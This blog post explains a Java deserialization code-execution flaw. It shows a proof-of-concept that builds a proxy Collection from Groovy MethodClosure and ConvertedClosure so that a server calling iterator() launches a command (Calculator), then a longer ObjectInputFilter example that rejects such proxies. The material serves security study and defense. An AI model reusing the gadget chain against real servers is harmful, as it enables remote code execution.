Network Security

1: Code execution vulnerability

An attacker may be able to run applications on the server.

private static final String COMMAND = "/Applications/Calculator.app/Contents/MacOS/Calculator";

private static Collection<String> makeExploitCollection() {
    // Create a mock collection with the reflection API that only implements
    // iterator, which we know will be called on the server
    MethodClosure methodClosure = new MethodClosure(COMMAND, "execute");
    ConvertedClosure iteratorHandler = new ConvertedClosure(methodClosure, "iterator");

    Collection exploitCollection = (Collection) Proxy.newProxyInstance(
            Client.class.getClassLoader(), new Class<?>[]{Collection.class}, iteratorHandler
    );

    return exploitCollection;
}
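
A defensive counterpart to the proxy above, as an added example that is not part of the original post: assuming the server receives the collection through Java native serialization (the post does not say which transport is used) and runs Java 9 or later, an allow-list `ObjectInputFilter` refuses dynamic proxies and unexpected classes before `iterator()` is ever called. `CollectionFilterDemo`, `InertHandler` and the allow-list contents are hypothetical.

```java
import java.io.*;
import java.lang.reflect.*;
import java.util.*;
// Added example (hypothetical names). Assumes Java 9+ and a server that expects
// an ArrayList<String> from clients over Java native serialization.
public class CollectionFilterDemo {
    static final Set<String> ALLOWED =
            Set.of("java.util.ArrayList", "java.lang.String", "java.lang.Object");

    static ObjectInputFilter.Status check(ObjectInputFilter.FilterInfo info) {
        Class<?> c = info.serialClass();
        if (c == null) return ObjectInputFilter.Status.UNDECIDED; // limits-only callback
        while (c.isArray()) c = c.getComponentType();
        if (c.isPrimitive()) return ObjectInputFilter.Status.ALLOWED;
        // Dynamic proxies and anything off the allow-list are refused during
        // stream parsing, before the server can call iterator() on the object.
        if (Proxy.isProxyClass(c) || !ALLOWED.contains(c.getName()))
            return ObjectInputFilter.Status.REJECTED;
        return ObjectInputFilter.Status.ALLOWED;
    }

    static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(CollectionFilterDemo::check);
            return in.readObject();
        }
    }
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buf)) { out.writeObject(o); }
        return buf.toByteArray();
    }

    // Constructed, inert handler standing in for an untrusted one.
    static class InertHandler implements InvocationHandler, Serializable {
        public Object invoke(Object proxy, Method m, Object[] args) { return null; }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(readFiltered(serialize(new ArrayList<>(List.of("a", "b")))));
        Object proxy = Proxy.newProxyInstance(CollectionFilterDemo.class.getClassLoader(),
                new Class<?>[]{Collection.class}, new InertHandler());
        try {
            readFiltered(serialize(proxy));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The expected `ArrayList` passes the filter, while the proxy is stopped with an `InvalidClassException` while its class descriptor is being read.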
posted @ 2021-04-28 10:34  zhonghuahero